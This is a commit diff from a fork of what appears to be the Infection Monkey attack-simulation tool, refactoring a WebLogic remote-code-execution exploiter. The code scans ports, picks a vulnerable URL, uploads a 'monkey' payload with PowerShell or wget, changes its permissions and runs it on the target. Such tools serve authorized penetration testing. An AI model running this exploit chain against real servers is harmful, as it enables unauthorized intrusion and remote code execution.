forked from p34709852/monkey
Webblogic refactored to web RCE framework changes(from static methods into class methods)
This commit is contained in:
parent
66bc852742
commit
10528c313d
|
@ -10,7 +10,7 @@ from requests import post, exceptions
|
|||
from web_rce import WebRCE
|
||||
from exploit.tools import get_free_tcp_port, get_interface_to_target
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD
|
||||
from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD
|
||||
|
||||
import threading
|
||||
import logging
|
||||
|
@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE):
|
|||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
|
||||
def __init__(self, host):
|
||||
super(WebLogicExploiter, self).__init__(host)
|
||||
super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
|
||||
'win32': 'monkey-32.exe',
|
||||
'win64': 'monkey-64.exe'})
|
||||
|
||||
def exploit_host(self):
|
||||
# Get open ports
|
||||
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = WebRCE.build_potential_urls(self.host, ports, URLS)
|
||||
|
||||
exploiter = self.exploit
|
||||
urls = self.build_potential_urls(ports, URLS)
|
||||
|
||||
# Checking takes a lot of time, so we check until we get exploitable url and stop
|
||||
vulnerable_urls = []
|
||||
|
@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE):
|
|||
if not vulnerable_urls:
|
||||
return False
|
||||
|
||||
# Somehow we can't save files outside server's directory
|
||||
config = copy.deepcopy(self._config)
|
||||
config.dropper_target_path_win_32 = 'monkey-32.exe'
|
||||
config.dropper_target_path_win_64 = 'monkey-64.exe'
|
||||
config.dropper_target_path_linux = './monkey.sh'
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0],
|
||||
{'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED,
|
||||
'linux': WGET_HTTP_UPLOAD})
|
||||
data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if not data or data['response'] == False:
|
||||
if not data or data['response'] is False:
|
||||
return False
|
||||
|
||||
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False:
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
|
Loading…
Reference in New Issue